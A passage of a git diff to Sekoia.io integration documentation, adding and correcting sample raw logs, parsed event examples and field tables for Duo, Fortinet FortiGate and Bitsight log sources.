\"373bd5f3-1e42-4a5d-aefa-b33ae278fac8\", \"type\": \"phone\"}", "event": { "category": [ "authentication" @@ -273,7 +406,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"enrollment\",\n \"credits\": 1,\n \"phone\": \"+12125556707\",\n \"telephony_id\": \"220f89ff-bff8-4466-b6cb-b7787940ce68\",\n \"ts\": \"2023-03-21T22:34:49.466370+00:00\",\n \"txid\": \"2f5d34d3-053f-422c-9dd4-77a5d58706b1\",\n \"type\": \"sms\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"enrollment\", \"credits\": 1, \"phone\": \"+12125556707\", \"telephony_id\": \"220f89ff-bff8-4466-b6cb-b7787940ce68\", \"ts\": \"2023-03-21T22:34:49.466370+00:00\", \"txid\": \"2f5d34d3-053f-422c-9dd4-77a5d58706b1\", \"type\": \"sms\"}", "event": { "category": [ "authentication" @@ -322,6 +455,7 @@ The following table lists the fields that are extracted, normalized under the EC |`host.name` | `keyword` | Name of the host. | |`host.os.name` | `keyword` | Operating system name, without the version. | |`host.os.version` | `keyword` | Operating system version as a raw string. | +|`observer.hostname` | `keyword` | Hostname of the observer. | |`observer.product` | `keyword` | The product name of the observer. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`source.geo.city_name` | `keyword` | City name. | diff --git a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md index 33d2fa40a9..10e38a1b44 100644 --- a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md +++ b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e_sample.md @@ -4,6 +4,24 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "test_admin_log" + + + ```json + { + "action": "admin_login", + "description": "{\"ip_address\": \"1.2.3.4\", \"role\": \"Owner\", \"device\": \"+555 123456\", \"factor\": \"push\", \"primary_auth_method\": \"Password\"}", + "isotimestamp": "2024-08-06T09:52:42+00:00", + "object": null, + "timestamp": 1722937962, + "username": "John Doe", + "eventtype": "admin_log", + "host": "example.duosecurity.com" + } + ``` + + + === "test_admin_log_error" @@ -117,6 +135,89 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_auth_log_2" + + + ```json + { + "access_device": { + "browser": "Electron", + "browser_version": "11.5.0", + "epkey": "EPKEYEXAMPLE", + "flash_version": "uninstalled", + "hostname": null, + "ip": "1.2.3.4", + "is_encryption_enabled": "unknown", + "is_firewall_enabled": "unknown", + "is_password_set": "unknown", + "java_version": "uninstalled", + "location": { + "city": "Paris", + "country": "France", + "state": "\u00cele-de-France" + }, + "os": "Windows", + "os_version": "10" + }, + "adaptive_trust_assessments": { + "more_secure_auth": { + "detected_attack_detectors": null, + "features_version": "3.0", + "model_version": "2022.07.19.001", + "policy_enabled": false, + "preview_mode_enabled": true, + "reason": "Normal level of trust; no detection of known attack pattern", + "trust_level": "NORMAL" + }, + "remember_me": { + "features_version": "3.0", + "model_version": "2022.07.19.001", + "policy_enabled": false, + "reason": "Known Access IP", + "trust_level": "NORMAL" + } + }, + "alias": "", + "application": { + "key": "APPLICATIONKEY", + "name": "Fortigate VPN SSL - Single Sign-On" + }, + "auth_device": { + "ip": null, + "key": null, + "location": { + "city": null, + "country": null, + "state": null + }, + "name": null + }, + "email": "john.doe@example.com", + "event_type": "authentication", + "factor": "remembered_device", + "isotimestamp": "2024-08-06T13:06:35.435426+00:00", + "ood_software": null, + "rbfs_triggered_attacks": null, + "reason": "remembered_device", + "remembered_factor": "duo_push", + "result": "success", + "timestamp": 1722949595, + "trusted_endpoint_status": "unknown", + "txid": "9f79ad67-e7f5-4f33-850c-75175d79253a", + "user": { + "groups": [ + "GG_VPN_DUO (from AD sync \"AD Sync\")" + ], + "key": "EXAMPLEKEY", + "name": "vsainterosemeril" + }, + "eventtype": "auth_log", + "host": "example.duosecurity.com" + } + ``` + + + === "test_offline_log" diff --git a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md index e96591d00a..a2dbf0c83b 100644 --- a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md +++ b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981.md @@ -21,7 +21,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Configuration_changed.CEF.json" @@ -397,6 +397,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "agt" } + }, + "user": { + "name": "agt" } } @@ -631,6 +634,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "test" } + }, + "user": { + "name": "test" } } @@ -829,6 +835,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "sip:sipp@127.0.0.1:5060" } + }, + "user": { + "name": "sip:sipp@127.0.0.1:5060" } } @@ -1549,6 +1558,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "url": { "original": "/success.txt", "path": "/success.txt" + }, + "user": { + "name": "alice" } } @@ -1644,6 +1656,73 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "bob" } + }, + "user": { + "name": "bob" + } + } + + ``` + + +=== "editpolicy.json" + + ```json + + { + "message": "time=11:36:13 devname=\"PC-01-OS1\" devid=\"XXXXXXXXXXXX\" eventtime=1721727373453168766 tz=\"+0200\" logid=\"010000000\" type=\"event\" subtype=\"system\" level=\"information\" vd=\"AAAA-AA\" logdesc=\"Object attribute configured\" user=\"username\" ui=\"GUI(1.0.0.0)\" action=\"Edit\" cfgtid=111111111 uuid=\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\" cfgpath=\"firewall.policy\" cfgobj=\"756\" cfgattr=\"service[svc-win->svc-repo-linux-port]\" msg=\"Edit firewall.policy 756\"", + "event": { + "action": "Edit", + "category": "event", + "code": "010000000", + "dataset": "event:system", + "outcome": "success", + "reason": "Edit firewall.policy 756", + "timezone": "+0200" + }, + "@timestamp": "2024-07-23T09:36:13.453169Z", + "action": { + "name": "Edit", + "outcome": "success", + "outcome_reason": "Edit firewall.policy 756", + "type": "system" + }, + "fortinet": { + "fortigate": { + "event": { + "type": "event" + }, + "poluuid": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx", + "virtual_domain": "AAAA-AA" + } + }, + "host": { + "name": "PC-01-OS1" + }, + "log": { + "description": "Object attribute configured", + "hostname": "PC-01-OS1", + "level": "information" + }, + "observer": { + "hostname": "PC-01-OS1", + "serial_number": "XXXXXXXXXXXX" + }, + "related": { + "hosts": [ + "PC-01-OS1" + ], + "user": [ + "username" + ] + }, + "source": { + "user": { + "name": "username" + } + }, + "user": { + "name": "username" } } @@ -1721,6 +1800,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "testpc1@qa.fortinet.com" } + }, + "user": { + "name": "testpc1@qa.fortinet.com" } } @@ -1842,6 +1924,113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "forwadedfor.json" + + ```json + + { + "message": "time=10:59:48 devname=\"FW-001\" devid=\"xxxxxxxxxx\" eventtime=1720429188081127405 tz=\"+0200\" logid=\"0000000\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" policyid=00000 poluuid=\"xxxxxx-xxxx-xxxx-xxxxxx\" policytype=\"policy\" sessionid=111111111 srcip=11.0.0.0 srcport=1000 srccountry=\"France\" srcintf=\"aaaaaaaaa\" srcintfrole=\"wan\" srcuuid=\"xxxxxx-xxxx-xxxx-xxxxxxxxxxx\" dstip=10.0.0.1 dstport=80 dstcountry=\"Reserved\" dstintf=\"aaaaaaaa\" dstintfrole=\"lan\" dstuuid=\"xxxxxxx-xxxx-xxxx-xxxxxxxxxxxx\" proto=6 service=\"HTTP\" hostname=\"sekoia.io\" forwardedfor=\"1.2.3.4\" profile=\"monitor-all\" action=\"passthrough\" reqtype=\"direct\" url=\"http://sekoia.io/\" sentbyte=270 rcvdbyte=0 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=51 catdesc=\"Government and Legal Organizations\"", + "event": { + "action": "passthrough", + "category": "utm", + "code": "0000000", + "outcome": "success", + "provider": "domain", + "reason": "URL belongs to an allowed category in policy", + "timezone": "+0200" + }, + "@timestamp": "2024-07-08T08:59:48.081128Z", + "action": { + "name": "passthrough", + "outcome": "success", + "outcome_reason": "URL belongs to an allowed category in policy", + "target": "network-traffic", + "type": "webfilter" + }, + "destination": { + "address": "10.0.0.1", + "bytes": 0, + "domain": "sekoia.io", + "ip": "10.0.0.1", + "port": 80 + }, + "fortinet": { + "fortigate": { + "event": { + "type": "utm" + }, + "policyid": "00000", + "poluuid": "xxxxxx-xxxx-xxxx-xxxxxx", + "virtual_domain": "root" + } + }, + "host": { + "name": "FW-001" + }, + "http": { + "request": { + "method": "domain" + } + }, + "log": { + "hostname": "FW-001", + "level": "notice" + }, + "network": { + "bytes": 270, + "forwarded_ip": "1.2.3.4", + "protocol": "http", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "aaaaaaaa" + } + }, + "hostname": "FW-001", + "ingress": { + "interface": { + "name": "aaaaaaaaa" + } + }, + "serial_number": "xxxxxxxxxx" + }, + "related": { + "hosts": [ + "FW-001", + "sekoia.io" + ], + "ip": [ + "10.0.0.1", + "11.0.0.0" + ] + }, + "rule": { + "category": "Government and Legal Organizations", + "ruleset": "policy" + }, + "source": { + "address": "11.0.0.0", + "bytes": 270, + "ip": "11.0.0.0", + "port": 1000 + }, + "url": { + "domain": "sekoia.io", + "full": "http://sekoia.io/", + "original": "http://sekoia.io/", + "path": "/", + "port": 80, + "registered_domain": "sekoia.io", + "scheme": "http", + "top_level_domain": "io" + } + } + + ``` + + === "hostname.STANDARD.json" ```json @@ -2556,7 +2745,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "2.2.2.2", - "bytes": 202, + "bytes": 52, "ip": "2.2.2.2", "port": 1522 }, @@ -2589,7 +2778,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "1.1.1.1", - "bytes": 52, + "bytes": 202, "ip": "1.1.1.1", "port": 55390 } @@ -2620,7 +2809,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "3.3.3.3", - "bytes": 48, + "bytes": 144, "ip": "3.3.3.3", "nat": { "ip": "2.2.2.2", @@ -2662,7 +2851,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "1.1.1.1", - "bytes": 144, + "bytes": 48, "ip": "1.1.1.1", "packets": 1, "port": 49260 @@ -2694,7 +2883,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "52.53.140.235", - "bytes": 3652, + "bytes": 146668, "ip": "52.53.140.235", "port": 443 }, @@ -2731,7 +2920,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "10.1.100.11", - "bytes": 146668, + "bytes": 3652, "ip": "10.1.100.11", "nat": { "ip": "172.16.200.1", @@ -2745,6 +2934,77 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "traffic_forward.CEF-4.json" + + ```json + + { + "message": "CEF:0|Fortinet|Fortigate|v7.2.8|00013|traffic:forward client-rst|3|deviceExternalId=FGTEXAMPLE subtype=forward FTNTFGTlevel=notice FTNTFGTvd=root src=1.2.3.4 shost=EX1234 spt=59020 deviceInboundInterface=LAN-EX-SRV FTNTFGTsrcintfrole=lan dst=5.6.7.8 dpt=65359 deviceOutboundInterface=CASio-1_0 FTNTFGTdstintfrole=wan FTNTFGTsrccountry=Reserved FTNTFGTdstcountry=Reserved externalId=26368100 proto=6 act=client-rst FTNTFGTpolicyid=353 FTNTFGTpolicytype=policy FTNTFGTpoluuid=2967ec4c-c4d7-51ed-30a5-720dc6023629 FTNTFGTpolicyname=AD-CASio_TO_DC app=tcp/65359 FTNTFGTtrandisp=noop FTNTFGTduration=175 out=3608 in=2571 FTNTFGTsentpkt=15 FTNTFGTrcvdpkt=11 FTNTFGTvpntype=ipsecvpn FTNTFGTvwlid=4 FTNTFGTvwlquality=Seq_num(1 CASIio-1_0), alive, selected FTNTFGTvwlname=TO_JOE FTNTFGTappcat=unscanned FTNTFGTpsrcport=58624 FTNTFGTpdstport=135 FTNTFGTsentdelta=80 FTNTFGTrcvddelta=2519 FTNTFGTsrchwvendor=VMware FTNTFGTosname=Windows FTNTFGTsrcswversion=10 FTNTFGTunauthuser=srvc_forti-sso FTNTFGTunauthusersource=kerberos FTNTFGTmastersrcmac=00:11:22:33:44:55 FTNTFGTsrcmac=00:11:22:33:44:55 FTNTFGTsrcserver=0\n", + "event": { + "action": "client-rst", + "category": "traffic", + "code": "00013", + "dataset": "traffic:forward", + "outcome": "success" + }, + "action": { + "name": "client-rst", + "outcome": "success", + "target": "network-traffic", + "type": "forward" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 2571, + "ip": "5.6.7.8", + "port": 65359 + }, + "log": { + "level": "notice" + }, + "network": { + "application": "tcp/65359", + "bytes": 6179, + "protocol": "tcp/65359", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "CASio-1_0" + } + }, + "ingress": { + "interface": { + "name": "LAN-EX-SRV" + } + }, + "type": "Fortigate", + "vendor": "Fortinet", + "version": "v7.2.8" + }, + "related": { + "hosts": [ + "EX1234" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "EX1234", + "bytes": 3608, + "domain": "EX1234", + "ip": "1.2.3.4", + "packets": 15, + "port": 59020 + } + } + + ``` + + === "traffic_forward.CEF.json" ```json @@ -2766,7 +3026,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "3.3.3.3", - "bytes": 398, + "bytes": 1605, "domain": "3.3.3.3", "ip": "3.3.3.3", "packets": 5, @@ -2809,7 +3069,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "2.2.2.2", - "bytes": 1605, + "bytes": 398, "domain": "2.2.2.2", "ip": "2.2.2.2", "nat": { @@ -3416,6 +3676,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "test" } + }, + "user": { + "name": "test" } } @@ -3618,6 +3881,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "CN = foo.bar.baz.com" } + }, + "user": { + "name": "CN = foo.bar.baz.com" } } @@ -3682,6 +3948,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "name": "CN = foo.bar.baz.com" } + }, + "user": { + "name": "CN = foo.bar.baz.com" } } @@ -3712,7 +3981,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "destination": { "address": "185.230.61.185", - "bytes": 96, + "bytes": 0, "domain": "ambrishsriv.wixsite.com", "ip": "185.230.61.185", "port": 80, @@ -3763,7 +4032,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "source": { "address": "10.1.100.11", - "bytes": 0, + "bytes": 96, "ip": "10.1.100.11", "port": 59194 }, @@ -3838,6 +4107,7 @@ The following table lists the fields that are extracted, normalized under the EC |`log.level` | `keyword` | Log level of the log event. | |`network.application` | `keyword` | Application level protocol name. | |`network.bytes` | `long` | Total bytes transferred in both directions. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.egress.interface.name` | `keyword` | Interface name | diff --git a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md index 9d6698a476..fee16049c2 100644 --- a/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md +++ b/_shared_content/operations_center/integrations/generated/5702ae4e-7d8a-455f-a47b-ef64dd87c981_sample.md @@ -172,6 +172,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "editpolicy" + + ``` + time=11:36:13 devname="PC-01-OS1" devid="XXXXXXXXXXXX" eventtime=1721727373453168766 tz="+0200" logid="010000000" type="event" subtype="system" level="information" vd="AAAA-AA" logdesc="Object attribute configured" user="username" ui="GUI(1.0.0.0)" action="Edit" cfgtid=111111111 uuid="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx" cfgpath="firewall.policy" cfgobj="756" cfgattr="service[svc-win->svc-repo-linux-port]" msg="Edit firewall.policy 756" + ``` + + + === "email-spamfilter" ``` @@ -196,6 +204,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "forwadedfor" + + ``` + time=10:59:48 devname="FW-001" devid="xxxxxxxxxx" eventtime=1720429188081127405 tz="+0200" logid="0000000" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" policyid=00000 poluuid="xxxxxx-xxxx-xxxx-xxxxxx" policytype="policy" sessionid=111111111 srcip=11.0.0.0 srcport=1000 srccountry="France" srcintf="aaaaaaaaa" srcintfrole="wan" srcuuid="xxxxxx-xxxx-xxxx-xxxxxxxxxxx" dstip=10.0.0.1 dstport=80 dstcountry="Reserved" dstintf="aaaaaaaa" dstintfrole="lan" dstuuid="xxxxxxx-xxxx-xxxx-xxxxxxxxxxxx" proto=6 service="HTTP" hostname="sekoia.io" forwardedfor="1.2.3.4" profile="monitor-all" action="passthrough" reqtype="direct" url="http://sekoia.io/" sentbyte=270 rcvdbyte=0 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=51 catdesc="Government and Legal Organizations" + ``` + + + === "hostname" ``` @@ -293,6 +309,15 @@ In this section, you will find examples of raw logs as generated natively by the +=== "traffic_forward" + + ``` + CEF:0|Fortinet|Fortigate|v7.2.8|00013|traffic:forward client-rst|3|deviceExternalId=FGTEXAMPLE subtype=forward FTNTFGTlevel=notice FTNTFGTvd=root src=1.2.3.4 shost=EX1234 spt=59020 deviceInboundInterface=LAN-EX-SRV FTNTFGTsrcintfrole=lan dst=5.6.7.8 dpt=65359 deviceOutboundInterface=CASio-1_0 FTNTFGTdstintfrole=wan FTNTFGTsrccountry=Reserved FTNTFGTdstcountry=Reserved externalId=26368100 proto=6 act=client-rst FTNTFGTpolicyid=353 FTNTFGTpolicytype=policy FTNTFGTpoluuid=2967ec4c-c4d7-51ed-30a5-720dc6023629 FTNTFGTpolicyname=AD-CASio_TO_DC app=tcp/65359 FTNTFGTtrandisp=noop FTNTFGTduration=175 out=3608 in=2571 FTNTFGTsentpkt=15 FTNTFGTrcvdpkt=11 FTNTFGTvpntype=ipsecvpn FTNTFGTvwlid=4 FTNTFGTvwlquality=Seq_num(1 CASIio-1_0), alive, selected FTNTFGTvwlname=TO_JOE FTNTFGTappcat=unscanned FTNTFGTpsrcport=58624 FTNTFGTpdstport=135 FTNTFGTsentdelta=80 FTNTFGTrcvddelta=2519 FTNTFGTsrchwvendor=VMware FTNTFGTosname=Windows FTNTFGTsrcswversion=10 FTNTFGTunauthuser=srvc_forti-sso FTNTFGTunauthusersource=kerberos FTNTFGTmastersrcmac=00:11:22:33:44:55 FTNTFGTsrcmac=00:11:22:33:44:55 FTNTFGTsrcserver=0 + + ``` + + + === "traffic_forward" ``` diff --git a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md index 3e47b08fb6..8ed58fee42 100644 --- a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md +++ b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_1.json" @@ -327,7 +326,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -357,3 +356,6 @@ The following table lists the fields that are extracted, normalized under the EC |`vulnerability.score.base` | `float` | Vulnerability Base score. | |`vulnerability.severity` | `keyword` | Severity of the vulnerability. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Bitsight/security-performance-management). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md new file mode 100644 index 0000000000..6fd26d1361 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/57eda191-2f93-4fd9-99a2-fd8ffbcdff50_sample.md @@ -0,0 +1,517 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_event_1" + + + ```json + { + "temporary_id": "11111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "modal_data": { + "type": "overridden", + "reason": "Software version in extended support" + }, + "modal_tags": { + "Type": "MS IIS", + "Version": "7.5" + }, + "server": "MS IIS", + "version": "7.5" + }, + "geo_ip_location": "test", + "country": "test country", + "grade": "BAD", + "observed_ips": [ + "1.2.3.4" + ], + "port_list": [ + 80, + 81, + 8443, + 8880 + ], + "remediations": [ + { + "message": "Software version in extended support", + "help_text": "The software version is outside mainstream support and is currently in extended support.", + "remediation_tip": "Ensure the latest version of the software is installed. See supported versions." + } + ], + "sample_timestamp": "2024-06-29T21:02:18Z", + "dest_port": 80, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2023-10-04", + "searchable_details": "Software version in extended support,MS IIS,7.5" + }, + "evidence_key": "1.2.3.4", + "first_seen": "2023-10-04", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "server_software", + "risk_vector_label": "Server Software", + "rolledup_observation_id": "11111111111", + "severity": 8.0, + "severity_category": "material", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": "User from Test, Inc. said: \"Test assignments\" at 2023-11-28 12:27 UTC", + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "critical", + "importance": 0.49, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_2" + + + ```json + { + "temporary_id": "11111111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Detected service: HTTP", + "CPE": [ + "a:amazon:amazon_cloudfront" + ], + "Tags": [], + "Product": "CloudFront httpd", + "Title": "ERROR: The request could not be satisfied", + "transport": "tcp", + "Status": "HTTP/1.1 400 Bad Request", + "Server": "CloudFront" + }, + "final_location": "http://1.2.3.4:12/", + "geo_ip_location": "Location", + "country": "Country", + "grade": "NEUTRAL", + "remediations": [ + { + "message": "Detected service: HTTP", + "help_text": "This port was observed running HTTP, which used for sending and receiving Internet traffic.", + "remediation_tip": "" + } + ], + "sample_timestamp": "2024-06-29T08:37:25Z", + "dest_port": 443, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2024-02-13", + "searchable_details": "Detected service: HTTP,tcp,CloudFront httpd" + }, + "evidence_key": "143.204.213.175:443", + "first_seen": "2024-02-13", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "open_ports", + "risk_vector_label": "Open Ports", + "rolledup_observation_id": "1222222222222", + "severity": 1.0, + "severity_category": "minor", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "1111111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_3" + + + ```json + { + "temporary_id": "11111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Allows insecure protocol: TLSv1.0, Allows insecure protocol: TLSv1.1", + "certchain": [ + { + "dnsName": [ + "*.test.test", + "test.test" + ], + "endDate": "2025-05-15 23:59:59", + "issuerName": "C=TestC,O=TestO,CN=TestCN RSA Domain Validation Secure Server CA 3", + "keyAlgorithm": "RSA", + "keyLength": 2048, + "serialNumber": "111111111111111111111111", + "signatureAlgorithm": "SHA384WITHRSA", + "startDate": "2024-05-07 00:00:00", + "subjectName": "CN=*.test.test" + }, + { + "dnsName": [], + "endDate": "2033-08-01 23:59:59", + "issuerName": "C=TestC,ST=TestST,L=TestL,O=TestO,CN=TestCN RSA Certification Authority", + "keyAlgorithm": "RSA", + "keyLength": 3072, + "serialNumber": "1111111111111111111111111111", + "signatureAlgorithm": "SHA384WITHRSA", + "startDate": "2023-08-02 00:00:00", + "subjectName": "C=TestC,O=TestO,CN=TestCN RSA Domain Validation Secure Server CA 3" + } + ] + }, + "final_location": "https://1.2.3.4/", + "geo_ip_location": "Test", + "country": "Test country", + "grade": "BAD", + "observed_ips": [ + "1.2.3.4:443" + ], + "remediations": [ + { + "message": "Allows insecure protocol: TLSv1.0", + "help_text": "TLS version 1.0 has been deprecated.", + "remediation_tip": "Disable TLS 1.0. See our guide for remediating TLS/SSL Configuration findings." + }, + { + "message": "Allows insecure protocol: TLSv1.1", + "help_text": "TLS version 1.1 has been deprecated.", + "remediation_tip": "Disable TLS 1.1. See our guide on verifying TLS is disabled." + } + ], + "sample_timestamp": "2024-06-29T00:49:11Z", + "dest_port": 443, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2024-06-20", + "searchable_details": "test details" + }, + "evidence_key": "18.134.200.62:443", + "first_seen": "2024-06-20", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "ssl_configurations", + "risk_vector_label": "SSL Configurations", + "rolledup_observation_id": "122222222222222222", + "severity": 10.0, + "severity_category": "severe", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "11111111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_4" + + + ```json + { + "temporary_id": "11111111111111111111111111111111", + "affects_rating": true, + "details": { + "cvss": { + "base": [] + }, + "check_pass": "", + "diligence_annotations": { + "message": "Detected service: HTTPS", + "CPE": [ + "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*" + ], + "Tags": [], + "Title": "Service", + "transport": "tcp", + "Status": "HTTP/1.1 200 OK", + "Server": "Microsoft-HTTPAPI/2.0" + }, + "final_location": "https://1.2.3.4:8086/", + "geo_ip_location": "Test", + "country": "TestCountry", + "grade": "GOOD", + "remediations": [ + { + "message": "Detected service: HTTPS", + "help_text": "This port was observed running Hypertext Transfer Protocol Secure (HTTPS), which is used for sending and receiving secure internet traffic.", + "remediation_tip": "" + } + ], + "sample_timestamp": "2024-06-29T11:52:03Z", + "dest_port": 8086, + "rollup_end_date": "2024-06-29", + "rollup_start_date": "2023-05-13", + "searchable_details": "Detected service: HTTPS,tcp" + }, + "evidence_key": "1.2.3.4:8086", + "first_seen": "2023-05-13", + "last_seen": "2024-06-29", + "related_findings": [], + "risk_category": 